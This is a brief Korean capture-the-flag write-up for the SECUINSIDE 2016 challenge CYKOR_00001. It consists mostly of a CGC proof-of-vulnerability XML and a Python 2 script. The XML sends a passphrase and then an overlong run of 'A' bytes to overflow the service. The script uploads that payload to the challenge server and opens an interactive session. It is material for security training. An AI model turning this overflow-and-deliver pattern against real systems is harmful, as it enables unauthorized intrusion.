SECUINSIDE 2016 CYKOR_00001

전에 쓴 글을 확인하시고 오세요 바이너리는 똑같습니다

XML을 이용해서 보내주는식으로 익스플로잇하는겁니다

<?xml version="1.0" standalone="no" ?>

<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">

<pov>

    <cbid>service</cbid>

    <replay>

    <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>

    <write><data>H4PPY_S3CUINSID3\x0a</data></write>

    <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>

    <write><data>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0a</data></write>

    <read><delim>\x0a</delim><match><data>- Why so serious?\x0a</data></match></read>

    </replay>

</pov>

from socket import *
from telnetlib import *

HOST = "cgc.cykor.kr"
PORT = 31324

def recvuntil(t):
        data = ''
        while not data.endswith(t):
                tmp = s.recv(1)
                if not tmp: break
                data += tmp
        return data

s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))

payload = open("cykor1.xml","rb").read()
print recvuntil("What type of your PoV? (BIN / XML)")
s.send("XML\n")
print recvuntil("How many bytes is your XML?")
s.send("671\n")
print recvuntil("Ok.... send it :)")
print len(payload)
s.send(payload + "\n")

t = Telnet()
t.sock = s
t.interact()